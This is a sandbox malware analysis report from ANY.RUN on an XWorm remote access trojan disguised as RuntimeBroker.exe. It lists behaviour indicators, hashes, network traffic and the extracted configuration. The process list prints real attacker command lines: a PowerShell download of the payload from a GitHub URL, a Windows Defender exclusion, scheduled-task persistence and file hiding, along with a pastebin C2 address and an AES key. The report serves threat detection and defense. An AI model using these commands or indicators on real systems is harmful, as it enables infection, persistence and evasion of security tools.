File name:

RuntimeBroker.exe

Full analysis: https://app.any.run/tasks/d09d3bb6-0263-430b-bc9b-f6e46f9e2361
Verdict: Malicious activity
Threats:

XWorm is a remote access trojan (RAT) sold as a malware-as-a-service. It possesses an extensive hacking toolset and is capable of gathering private information and files from the infected computer, hijacking MetaMask and Telegram accounts, and tracking user activity. XWorm is typically delivered to victims' computers through multi-stage attacks that start with phishing emails.

Malware Trends Tracker     >>>
Analysis date: May 17, 2025, 04:56:41
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
pastebin
xworm
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections
MD5:

D78D6BEFF16E0D1C8B3F2630706B5E49

SHA1:

98830BBFD4DF8316B7F59BE1FB39EF0984D8460E

SHA256:

D88F7AAA7CA6BA24FD0E63DC5C1A36D27AEAE45645DD373722F9F4E02E80AA4E

SSDEEP:

98304:ME2CBxaQm2+xrwZTc5mejU/jUsP4dppEPRe88fjwlulzeDKS491gWdBwE65VRPTf:ZeV9gJ/jSUYnCc

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7676)
      • powershell.exe (PID: 4628)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 8084)

    • Changes Windows Defender settings

      • cmd.exe (PID: 8084)

    • Create files in the Startup directory

      • RuntimeBroker.exe (PID: 6564)

    • Uses Task Scheduler to run other applications

      • RuntimeBroker.exe (PID: 6564)

    • XWORM has been detected (YARA)

      • RuntimeBroker.exe (PID: 6564)

  • SUSPICIOUS

    • Process drops legitimate windows executable

      • RuntimeBroker.exe (PID: 7464)

    • Starts a Microsoft application from unusual location

      • RuntimeBroker.exe (PID: 7464)

    • Reads the date of Windows installation

      • RuntimeBroker.exe (PID: 7464)
      • RuntimeBroker.exe (PID: 6564)

    • Reads security settings of Internet Explorer

      • RuntimeBroker.exe (PID: 7464)
      • RuntimeBroker.exe (PID: 6564)

    • Executable content was dropped or overwritten

      • RuntimeBroker.exe (PID: 7464)
      • powershell.exe (PID: 2108)
      • RuntimeBroker.exe (PID: 6564)

    • Executing commands from a ".bat" file

      • RuntimeBroker.exe (PID: 7464)
      • wscript.exe (PID: 7984)

    • Starts CMD.EXE for commands execution

      • RuntimeBroker.exe (PID: 7464)
      • wscript.exe (PID: 7984)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 7608)
      • cmd.exe (PID: 8084)

    • Executes application which crashes

      • XWorm V5.6 Crack.exe (PID: 7580)

    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7608)
      • cmd.exe (PID: 8084)

    • The process executes VB scripts

      • cmd.exe (PID: 7608)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 8084)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7984)

    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 8084)

    • The executable file from the user directory is run by the CMD process

      • RuntimeBroker.exe (PID: 6564)

    • The process creates files with name similar to system file names

      • RuntimeBroker.exe (PID: 6564)

    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 2196)

    • Connects to unusual port

      • RuntimeBroker.exe (PID: 6564)

    • The process executes via Task Scheduler

      • svhost.exe (PID: 7588)

  • INFO

    • Reads the computer name

      • RuntimeBroker.exe (PID: 7464)
      • XWorm V5.6 Crack.exe (PID: 7580)
      • RuntimeBroker.exe (PID: 6564)
      • svhost.exe (PID: 7588)

    • Create files in a temporary directory

      • RuntimeBroker.exe (PID: 7464)

    • Reads the machine GUID from the registry

      • RuntimeBroker.exe (PID: 7464)
      • XWorm V5.6 Crack.exe (PID: 7580)
      • RuntimeBroker.exe (PID: 6564)
      • svhost.exe (PID: 7588)

    • Process checks computer location settings

      • RuntimeBroker.exe (PID: 7464)
      • RuntimeBroker.exe (PID: 6564)

    • Checks supported languages

      • RuntimeBroker.exe (PID: 7464)
      • XWorm V5.6 Crack.exe (PID: 7580)
      • RuntimeBroker.exe (PID: 6564)
      • svhost.exe (PID: 7588)

    • Creates files or folders in the user directory

      • WerFault.exe (PID: 7852)
      • RuntimeBroker.exe (PID: 6564)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 7212)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7212)

    • Disables trace logs

      • powershell.exe (PID: 2108)
      • RuntimeBroker.exe (PID: 6564)

    • Checks proxy server information

      • powershell.exe (PID: 2108)
      • RuntimeBroker.exe (PID: 6564)
      • slui.exe (PID: 7956)

    • Reads Environment values

      • RuntimeBroker.exe (PID: 6564)

    • Reads the software policy settings

      • RuntimeBroker.exe (PID: 6564)
      • slui.exe (PID: 7956)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

XWorm

(PID) Process(6564) RuntimeBroker.exe
C2https://pastebin.com/raw/0gQJh4kU:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeRanan
USB drop nameUSB.exe
Mutex4VryPVus4c0Pt4nK
No Malware configuration.

TRiD

.exe | Generic CIL Executable (.NET, Mono, etc.) (56.7)
.exe | Win64 Executable (generic) (21.3)
.scr | Windows screen saver (10.1)
.dll | Win32 Dynamic Link Library (generic) (5)
.exe | Win32 Executable (generic) (3.4)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:11:30 20:05:38+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 11
CodeSize: 13678592
InitializedDataSize: 2560
UninitializedDataSize: -
EntryPoint: 0xd0d63e
OSVersion: 4
ImageVersion: -
SubsystemVersion: 4
Subsystem: Windows GUI
FileVersionNumber: 10.0.18362.1
ProductVersionNumber: 10.0.18362.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: Host Process for Windows Services
CompanyName: Microsoft Corporation
FileDescription: Windows Update Assistant
FileVersion: 10.0.18362.1
InternalName: BlackBinderStub.exe
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: BlackBinderStub.exe
ProductName: Microsoft® Windows® Operating System
ProductVersion: 10.0.18362.1
AssemblyVersion: 10.0.18362.1
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
153
Monitored processes
22
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start runtimebroker.exe xworm v5.6 crack.exe cmd.exe no specs conhost.exe no specs powershell.exe no specs werfault.exe no specs cacls.exe no specs wscript.exe no specs cmd.exe conhost.exe no specs powershell.exe no specs cacls.exe no specs powershell.exe no specs attrib.exe no specs powershell.exe #XWORM runtimebroker.exe attrib.exe no specs schtasks.exe no specs conhost.exe no specs svchost.exe slui.exe svhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2108Powershell -Command "Invoke-Webrequest 'https://github.com/wha-gifart/gifart/releases/download/SDA/RuntimeBroker.exe' -OutFile RuntimeBroker.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2244"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svhost" /tr "C:\Users\admin\AppData\Roaming\svhost.exe"C:\Windows\System32\schtasks.exeRuntimeBroker.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4628powershell -window hidden -command ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4724attrib +h "C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\fsutilext.dll
5576attrib +h "Anon" /s /dC:\Windows\System32\attrib.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Attribute Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
6372\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeschtasks.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6564RuntimeBroker.exe C:\Users\admin\AppData\Local\Anon\RuntimeBroker.exe
cmd.exe
User:
admin
Integrity Level:
HIGH
Description:
Version:
1.0.0.0
Modules
Images
c:\users\admin\appdata\local\anon\runtimebroker.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
XWorm
(PID) Process(6564) RuntimeBroker.exe
C2https://pastebin.com/raw/0gQJh4kU:<123456789>
Keys
AES<Xwormmm>
Options
Splitter3
Sleep timeRanan
USB drop nameUSB.exe
Mutex4VryPVus4c0Pt4nK
7176"C:\WINDOWS\system32\cacls.exe" "C:\WINDOWS\system32\config\system"C:\Windows\System32\cacls.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Control ACLs Program
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cacls.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ucrtbase.dll
7212powershell.exe -command "Add-MpPreference -ExclusionPath "C:\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
Total events
23 297
Read events
23 296
Write events
1
Delete events
0

Modification events

(PID) Process:(7608) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.vbs\OpenWithProgids
Operation:writeName:VBSFile
Value:
Executable files
3
Suspicious files
4
Text files
11
Unknown types
0

Dropped files

PID
Process
Filename
Type
7852WerFault.exeC:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_XWorm V5.6 Crack_c569b0d057f4ed6cc6bef51896a3c7cd46901fed_6dbd6ba6_ce93f57c-aea0-480d-baf7-e47a2c744486\Report.wer
MD5:
SHA256:
7852WerFault.exeC:\Users\admin\AppData\Local\CrashDumps\XWorm V5.6 Crack.exe.7580.dmp
MD5:
SHA256:
7676powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5h2fvomr.3zh.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7852WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WEREEB8.tmp.WERInternalMetadata.xmlbinary
MD5:4560C45E8CDCA26293BFF219B85DC396
SHA256:1216BB0FE4C6B1C01FABF0FE142A67DFD3156402EFD499BF19ECF33B2C3DFDC4
7676powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dkqkwiue.je1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7464RuntimeBroker.exeC:\Users\admin\AppData\Local\Temp\a.battext
MD5:527036CAE6EBF86E4ADFC2B46E458052
SHA256:6F55DD423E865B5DF8A6630124C0CEC575D8F8141458CCA0EFF7DB3F6C1FCC2B
7852WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WEREED8.tmp.xmlxml
MD5:604571D6534B056915C708C689F9F7C8
SHA256:347501D9035C0BF41DCA28F4CA5222C13D02AAB09F14E2FE8D7B84FC9DF8A86D
4628powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2fogz5hb.tyj.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7464RuntimeBroker.exeC:\Users\admin\AppData\Local\Temp\XWorm V5.6 Crack.exeexecutable
MD5:B78369660383BAD9F32046D3215D3AE4
SHA256:9348D9269A7B6DF38FBBA77630E7A85BB644FAAD70FD2C6714545D1DB7886F56
7852WerFault.exeC:\ProgramData\Microsoft\Windows\WER\Temp\WERECF2.tmp.dmpbinary
MD5:0B0AB83F842A4A638AA2F5769CF6A3FA
SHA256:1D0197A10356629AEA60D9F87D0DECCEC6A025C1E1FE4F1E82AB400D8D91A6BD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
29
DNS requests
15
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.216.77.6:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5496
MoUsoCoreWorker.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
7628
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7628
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
6544
svchost.exe
40.126.32.76:443
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.216.77.6:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
5496
MoUsoCoreWorker.exe
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
172.211.123.248:443
MICROSOFT-CORP-MSN-AS-BLOCK
FR
unknown
4
System
192.168.100.255:137
whitelisted
2112
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
ocsp.digicert.com
  • 2.17.190.73
whitelisted
google.com
  • 172.217.16.206
whitelisted
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.216.77.6
  • 23.216.77.42
  • 23.216.77.28
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
github.com
  • 140.82.121.4
whitelisted
objects.githubusercontent.com
  • 185.199.110.133
  • 185.199.111.133
  • 185.199.108.133
  • 185.199.109.133
whitelisted
pastebin.com
  • 104.22.68.199
  • 104.22.69.199
  • 172.67.25.94
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Online Pastebin Text Storage
2196
svchost.exe
Potential Corporate Privacy Violation
ET INFO DNS Query to a Reverse Proxy Service Observed
2196
svchost.exe
Misc activity
ET INFO DNS Query for Port Mapping/Tunneling Service Domain (.portmap .io)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
RuntimeBroker.exe